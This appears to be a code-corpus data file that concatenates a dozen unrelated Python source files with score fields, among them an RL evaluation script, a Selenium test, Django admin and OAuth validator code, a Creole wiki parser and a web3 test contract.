sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| 1.65625 | 2 |
src/part_2_automation/test_test1.py | AndreiHustiuc/IT_Factory_Course | 0 | 3348 | <reponame>AndreiHustiuc/IT_Factory_Course
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestTest1():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_test1(self):
self.driver.get("https://www.wikipedia.org/")
self.driver.set_window_size(1920, 1040)
self.driver.find_element(By.ID, "searchInput").click()
self.driver.find_element(By.ID, "searchInput").send_keys("Romania")
self.driver.find_element(By.ID, "searchInput").send_keys(Keys.ENTER)
self.driver.find_element(By.CSS_SELECTOR, ".tocsection-21 .toctext").click()
self.driver.execute_script("window.scrollTo(0,10634)")
self.driver.find_element(By.CSS_SELECTOR, ".thumb:nth-child(30) .thumbimage").click()
self.driver.execute_script("window.scrollTo(0,0)")
| 2.640625 | 3 |
app/grandchallenge/components/admin.py | njmhendrix/grand-challenge.org | 1 | 3349 | from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
| 1.820313 | 2 |
publishtimer/__init__.py | paragguruji/publishtimer | 0 | 3350 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 15:28:24 2016
@author: <NAME>, <EMAIL>
"""
from .helpers import setup_env
done = setup_env() | 1.015625 | 1 |
netdisco/discoverables/nanoleaf_aurora.py | jjlawren/netdisco | 1 | 3351 | <reponame>jjlawren/netdisco<filename>netdisco/discoverables/nanoleaf_aurora.py
"""Discover Nanoleaf Aurora devices."""
from . import MDNSDiscoverable
class Discoverable(MDNSDiscoverable):
"""Add support for discovering Nanoleaf Aurora devices."""
def __init__(self, nd):
super(Discoverable, self).__init__(nd, '_nanoleafapi._tcp.local.')
| 1.679688 | 2 |
debug/compute_score_common_ts_RETREAT.py | DavidSabbagh/meeg_power_regression | 1 | 3352 | import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| 1.851563 | 2 |
bter/publish.py | mengalong/bter | 1 | 3353 | <filename>bter/publish.py
# Copyright 2017~ mengalong <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import daiquiri
from six.moves.urllib import parse as urlparse
from stevedore import driver
logger = daiquiri.getLogger(__name__)
class PublisherManager(object):
def __init__(self, conf, url):
self.conf = conf
self.url = url
parsed_url = urlparse.urlparse(url)
logger.debug("The parsed url for publisher is :%s" % str(parsed_url))
self.publish_driver = driver.DriverManager(
'bter.publisher',
parsed_url.scheme,
invoke_args=(self.conf,),
invoke_on_load=True).driver
| 2.140625 | 2 |
web3/_utils/module_testing/math_contract.py | y19818/web3.py | 0 | 3354 |
MATH_BYTECODE = (
"606060405261022e806100126000396000f360606040523615610074576000357c01000000000000"
"000000000000000000000000000000000000000000009004806316216f391461007657806361bc22"
"1a146100995780637cf5dab0146100bc578063a5f3c23b146100e8578063d09de08a1461011d5780"
"63dcf537b11461014057610074565b005b610083600480505061016c565b60405180828152602001"
"91505060405180910390f35b6100a6600480505061017f565b604051808281526020019150506040"
"5180910390f35b6100d26004808035906020019091905050610188565b6040518082815260200191"
"505060405180910390f35b61010760048080359060200190919080359060200190919050506101ea"
"<KEY>"
"8082815260200191505060405180910390f35b610156600480803590602001909190505061021756"
"5b6040518082815260200191505060405180910390f35b6000600d9050805080905061017c565b90"
"565b60006000505481565b6000816000600082828250540192505081905550600060005054905080"
"507f3496c3ede4ec3ab3686712aa1c238593ea6a42df83f98a5ec7df9834cfa577c5816040518082"
"815260200191505060405180910390a18090506101e5565b919050565b6000818301905080508090"
"506101fb565b92915050565b600061020d6001610188565b9050610214565b90565b600060078202"
"90508050809050610229565b91905056"
)
MATH_ABI = [
{
"constant": False,
"inputs": [],
"name": "return13",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": True,
"inputs": [],
"name": "counter",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "amt", "type": "uint256"},
],
"name": "increment",
"outputs": [
{"name": "result", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
{"name": "b", "type": "int256"},
],
"name": "add",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [],
"name": "increment",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function"
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
],
"name": "multiply7",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"anonymous": False,
"inputs": [
{"indexed": False, "name": "value", "type": "uint256"},
],
"name": "Increased",
"type": "event",
},
]
| 1.203125 | 1 |
dnsdb/config.py | nuby/open_dnsdb | 1 | 3355 | <reponame>nuby/open_dnsdb
# -*- coding: utf-8 -*-
import os
import sys
from datetime import timedelta
from oslo.config import cfg
CONF = cfg.CONF
CONF.register_opts([
cfg.StrOpt('log-dir'),
cfg.StrOpt('log-file'),
cfg.StrOpt('debug'),
cfg.StrOpt('verbose'),
], 'log')
CONF.register_opts([
cfg.StrOpt('connection'),
cfg.StrOpt('data'),
], 'DB')
CONF.register_opts([
cfg.StrOpt('server'),
cfg.StrOpt('port'),
cfg.StrOpt('from_addr'),
cfg.StrOpt('info_list'),
cfg.StrOpt('alert_list'),
], 'MAIL')
CONF.register_opts([
cfg.StrOpt('allow_ip'),
cfg.StrOpt('secret_key'),
cfg.StrOpt('env'),
cfg.StrOpt('local_group'),
cfg.StrOpt('acl_dir'),
cfg.StrOpt('view_acl_group')
], 'etc')
CONF.register_opts([
cfg.IntOpt('dnsupdater_port'),
], 'api')
CONF.register_opts([
cfg.StrOpt('acl_groups'),
cfg.IntOpt('cname_ttl'),
cfg.StrOpt('view_zone')
], 'view')
CONF.register_opts([
cfg.StrOpt('base-url',
default='/',
help='The url prefix of this site.'),
cfg.StrOpt('run-mode',
default="werkzeug",
choices=('gunicorn', 'werkzeug'),
help="Run server use the specify mode."),
cfg.StrOpt('bind',
default='0.0.0.0',
help='The IP address to bind'),
cfg.IntOpt('port',
default=8080,
help='The port to listen'),
cfg.BoolOpt('debug',
default=False),
], 'web')
CONF.register_opts([
cfg.StrOpt('config',
default=None,
help='The path to a Gunicorn config file.'),
cfg.StrOpt('bind',
default='127.0.0.1:8888'),
cfg.IntOpt('workers',
default=0,
help='The number of worker processes for handling requests'),
cfg.BoolOpt('daemon',
default=False,
help='Daemonize the Gunicorn process'),
cfg.StrOpt('accesslog',
default=None,
help='The Access log file to write to.'
'"-" means log to stderr.'),
cfg.StrOpt('loglevel',
default='info',
help='The granularity of Error log outputs.',
choices=('debug', 'info', 'warning', 'error', 'critical')),
cfg.BoolOpt('ignore-healthcheck-accesslog',
default=False),
cfg.IntOpt('timeout',
default=30,
help='Workers silent for more than this many seconds are '
'killed and restarted.'),
cfg.StrOpt('worker-class',
default='sync',
help='The type of workers to use.',
choices=('sync', 'eventlet', 'gevent', 'tornado'))
], 'gunicorn')
def setup_config(app_env, app_kind, conf_dir):
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
class Config(object):
def __init__(self, app_env, app_kind, conf_dir):
# print 'conf_dir: ', conf_dir
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
self.SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
self.SQLALCHEMY_DATABASE_URI = CONF.DB.connection
self.SQLALCHEMY_TRACK_MODIFICATIONS = False
self.PERMANENT_SESSION_LIFETIME = timedelta(days=1)
# SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
# SQLALCHEMY_DATABASE_URI = CONF.DB.connection
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# PERMANENT_SESSION_LIFETIME = timedelta(days=1)
| 1.945313 | 2 |
rover/rover.py | cloudy/osr-rover-code | 0 | 3356 | from __future__ import print_function
import time
from rover import Robot
from connections import Connections
class Rover(Robot, Connections):
def __init__( self,
config,
bt_flag = 0,
xbox_flag = 0,
unix_flag = 0
):
self.bt_flag = bt_flag
self.xbox_flag = xbox_flag
self.unix_flag = unix_flag
super(Rover,self).__init__(config)
self.prev_cmd = [None,None]
if bt_flag and xbox_flag:
raise Exception( "[Rover init] Cannot initialize with both bluetooth and Xbox, run with only one argument")
elif bt_flag: self.connection_type = "b"
elif xbox_flag: self.connection_type = "x"
self.connectController()
def drive(self):
try:
v,r = self.getDriveVals()
if v,r != self.prev_cmd:
self.sendCommands(v,r)
self.prev_cmd = v,r
except KeyboardInterrupt:
self.cleanup()
except Exception as e:
print(e)
self.cleanup()
time.sleep(0.5)
self.connectController()
if self.unix_flag:
try:
self.sendUnixData()
except Exception as e:
print(e)
self.unix_flag = 0
def cleanup(self):
self.killMotors()
self.closeConnections()
| 2.671875 | 3 |
aswiki/parser.py | scanner/django-aswiki | 0 | 3357 | <filename>aswiki/parser.py
#
# File: $Id: parser.py 1865 2008-10-28 00:47:27Z scanner $
#
"""
This is where the logic and definition of our wiki markup parser lives.
We use the Python Creoleparser (which requires Genshi)
We make a custom dialect so that the parser can know the URL base for
all of the topics (pages) in the wiki and some additional goop so that
we can tell what other topics a given topic refers to.
"""
# system imports
#
from urllib import quote
from urlparse import urlparse
try:
import threading
except ImportError:
import dummy_threading as threading
# Django imports
#
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
# 3rd party imports
#
from creoleparser.dialects import create_dialect, creole10_base, creole11_base
from creoleparser.core import Parser
from genshi import builder
# We see if we have the 'typogrify' app installed. If we do we will
# use it for rendering our templates to prettify them a bit.
#
try:
from typogrify.templatetags.typogrify import typogrify
except ImportError:
def typogrify(text):
return text
# Model imports
#
from aswiki.models import Topic
############################################################################
############################################################################
#
class TopicList(object):
"""
A helper class we use to keep track of all of the topics that are
referenced by the raw content for a specific topic. We pass the
objet and method instead 'path_fn' in to the 'path_func' parameter
of our creole dialect we are goign to generate.
The point of this class is that we need to know what topics are
referenced by a specific topic when its content is created or
modified. This lets us know that list of topics by their topic
names.
"""
########################################################################
#
def __init__(self):
"""
Very plain init. We set up the attribute for tracking topics.
"""
# The current topic that is being rendered, if we know it. This
# lets us root image url's relative to this topic.
#
self.current_topic = None
# The list of topics that we have encountered while rendering
# some content. This should be reset between renders.
#
self.topics = []
# A dict mapping the lower case topic name to the original case used
# in the text being parsed. This is so we can preserve the case
# when doing things like creating nascent topics.
#
self.topics_case = { }
# This is another list. It contains Topic's that we have
# found this topic referring to not via [[wiki links]] but via
# other methods like the <<subtopics >> macro. We need this so
# that when we are done rendering we can find out what other topics
# we should list in this topic's references.
#
self.extra_references = []
# This is a bit of ugliness. Since we instantiate a TopicList and pass
# a method when we create an instance of a Creole _dialect_ this one
# instance will be shared across this process instance which may well
# exist across multiple calls to render text via the parser generated
# from the dialect, which means our list of topics will grow every
# time we render a document.
#
# However, this is a problem since for our current use we only want
# the topic names from rendering a single topic. So we have to make
# sure no other thread of execution (if there are other threads
# running.. if not this is a cheap operation.. XXX I think) modifies
# the topic list we have to provide a mutex so only one thread at a
# time can add topics to a topic list.
#
self.lock = threading.Lock()
return
########################################################################
#
def clear_and_lock(self):
"""
Locks the mutex to prevent conflicts on updating the topic list if
more then one thread tries to render using the same dialect instance
at the same time.
"""
self.lock.acquire()
self.topics = []
self.topics_case = { }
self.extra_references = []
return
########################################################################
#
def unlock(self):
"""
Unlocks the mutex. Do NOT access the topics parameter after this is
called. You can not be guaranteed whose list of topics you are seeing.
"""
self.lock.release()
return
##################################################################
#
def image_fn(self, image_name):
"""
This is called by our creole parser every time it hits an
image link. This lets us translate image names to be relative
to the topic they are found in as appropriate.
We only apply this magic transformation for images url's that
are relative.
Arguments:
- `image_name`: The name of the image being referenced.
"""
# If the image url is NOT absolute, root it relative to this
# topic.
#
u = urlparse(image_name)
if self.current_topic and len(u.path) > 0 and u.path[0] != "/":
return self.current_topic + "/" + image_name
return image_name
########################################################################
#
def path_fn(self, topic_name):
"""
This is called by our creole parser every time it encounters a
wiki link in the text it is parsing. This lets us track which
topics this text refers to.
We are passed in a topic name, and we return that topic
name.. if we were doing some sort of transformation on topic
names this is where it would happen.
Arguments:
- `topic_name`: The topic name being referenced as a wiki link.
"""
lower_topic_name = topic_name.lower()
# if this is a topic name we have not seen yet, add it to our list
# of topics.
#
if lower_topic_name not in self.topics:
self.topics.append(lower_topic_name)
self.topics_case[lower_topic_name] = topic_name
return topic_name
############################################################################
#
def class_fn(topic_name):
"""
This function is invoked by the markup dialect every time it encounters a
wiki topic. It returns a string that is the css class name to add to wiki
links as they are turned in to proper <a href></a> links.
We use this as a way to annotate topics that do not exist yet with some
graphical attribute so that users can easily tell which topics are not yet
created.
We use the wiki.models.TopicManager's css_class_name method to do this
lookup.
NOTE: Since this module is imported by the wiki.models module we need to
import that module inside here so that we can access the Topic
model. This is cheap since it will already be imported.
Arguments:
- `topic_name`: the topic name being checked for existence.
"""
# XXX This is where we should do a cache lookup of the topic name
# and only if that fails fall back to
# Topic.objects.css_class_name(topic_name)
#
return Topic.objects.css_class_name(topic_name)
####################################################################
#
def output_mailto(arg_string):
"""
Given the arguments of an anchor macro output the proper genshi
stream that will render a mailto link. We also need to support the magic
argument string format of '<you> AT <word> AT <foo> DOT <foo>'
Arguments:
- `arg_string`: The argument string of the anchor macro.
- `macro_body`: The macro body if provided
- `block_type`: True if this is a block macro.
"""
# XXX Need to support the fancy format.. but for now just get the basic
# working.
return builder.tag.a(arg_string, href="mailto:%s" % arg_string)
####################################################################
#
def output_subtopics(arg_string):
"""
This will take a single string as its input. It will find all
topics for which the string as a topic name is the parent topic.
There is some semantic magic in a topic if it contains periods, ie: the
'.' character. This forms a kind of hierarchy. Loosely speaking all topics
that start with the same prefix, separated by '.' are sub-topics.
So: 2007.Agenda is a sub-topic of 2007. 2007.Agenda.foo is a subtopic of
2007 and 2007.Agenda.
This macro will insert in to the output <ul> of the topics that are proper
subtopics of the given string, ordered by name. So in the above example if
I were to say <<subtopics 2007>> it would give me "2007.Agenda" and
"2007.Agenda.foo" in a <ul>
If the arg string ends with a dot, then it is treated as the
separator. ie: <<subtopics 2007.>> and <<subtopics 2007>> are identical.
Arguments:
- `arg_string`: The topic we want to find all subtopics of.
"""
arg_string = arg_string
if arg_string[-1] != '.':
arg_string = arg_string + "."
topics = Topic.objects.filter(lc_name__istartswith = arg_string.lower()).order_by('lc_name')
if topics.count() == 0:
return None
ul = builder.tag.ul()
# For every topic that matches our pattern we insert a 'li' link
# to that topic in our output. We also add this topic to the
# 'extra_references' list in our global TOPIC_LIST object. This is
# so that the prerender../save() methods of the Topic object we are
# rendering this output for can know to add those topics to the list
# of topics referenced by the topic being rendered.
for topic in topics:
TOPIC_LIST.extra_references.append(topic)
ul.append(builder.tag.li(builder.tag.a(topic.name,
href = topic.get_absolute_url())))
return ul
####################################################################
#
def output_attachments(arg_string):
"""
Returns a <ul> of all of the attachments attached to the topic name
given as the arg_string.
Arguments:
- `arg_string`: Expected to be the name of a topic. If no such topic
exist, then no attachment list is generated.
"""
try:
topic = Topic.objects.get(lc_name = arg_string.lower())
except Topic.DoesNotExist:
return None
ul = builder.tag.ul()
# For every file attachment on this topic, add a 'li' link
# to that attachment.
#
for attachment in topic.file_attachments.all():
ul.append(builder.tag.li(builder.tag.a(attachment.basename(),
href = attachment.get_absolute_url())))
return ul
####################################################################
#
def macro_fn(name, arg_string, macro_body, block_type, environ):
"""
Handles the macros we define for our version of markup.
Arguments:
- `name`: The name of the macro
- `arg_string`: The argument string, including any delimiters
- `macro_body`: The macro body, None for macro with no body.
- `block_type`: True for block type macros.
- `environ` : The environment object, passed through from
creoleparser.core.Parser class's 'parse()' method.
"""
name = name.strip().lower()
arg_string = arg_string.strip()
if name == 'anchor':
if block_type:
return builder.tag.a(macro_body, name = arg_string)
else:
return builder.tag.a(name = arg_string)
elif name == 'mailto':
return output_mailto(arg_string)
elif name == 'gettext':
if block_type:
return _(macro_body)
else:
return _(arg_string)
elif name == 'subtopics':
return output_subtopics(arg_string)
elif name == 'attachlist':
return output_attachments(arg_string)
elif name == 'attachment':
# For including downloadable attachments in a wiki document.
if block_type:
return builder.tag.a(macro_body, href=arg_string)
else:
return builder.tag.a(arg_string, href=arg_string)
return None
##
## Create our custom dialect. It will use our class function and a TopicList
## instance. The root URL for all wiki topics will be the same as the
## 'aswiki_topic_index' url.
##
## NOTE: This assumes that the url for a specific Topic is the same as the url
## for the aswiki_topic_index with the Topic name appended to it
##
TOPIC_LIST = TopicList()
# dialect = creoleparser.dialects.Creole10(
# wiki_links_base_url = reverse('aswiki_topic_index'),
# wiki_links_space_char = '%20',
# use_additions = True,
# no_wiki_monospace = False,
# wiki_links_class_func = class_fn,
# wiki_links_path_func = TOPIC_LIST.path_fn,
# macro_func = macro_fn,
# interwiki_links_base_urls=dict(wikicreole='http://wikicreole.org/wiki/',
# wikipedia='http://wikipedia.org/wiki/',)
# )
parser = Parser(dialect = create_dialect(\
creole11_base,
wiki_links_base_url = reverse('aswiki_topic_index'), # NOTE: Make this
# a two element
# list for images
# to be loaded
# from a separate
# URL
wiki_links_space_char = '%20', # NOTE: make this a two element list to
# give images a different space
# character.
no_wiki_monospace = False,
wiki_links_class_func = class_fn,
wiki_links_path_func = (TOPIC_LIST.path_fn,
TOPIC_LIST.image_fn),
bodied_macros = { },
non_bodied_macros = { },
macro_func = macro_fn,
# custom_markup = (),
interwiki_links_base_urls = {
'wikicreole' : 'http://wikicreole.org/wiki/',
'wikipedia' :'http://wikipedia.org/wiki/' }
))
| 2.703125 | 3 |
oauth_api/validators.py | anobi/django-oauth-api | 0 | 3358 | <reponame>anobi/django-oauth-api
import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
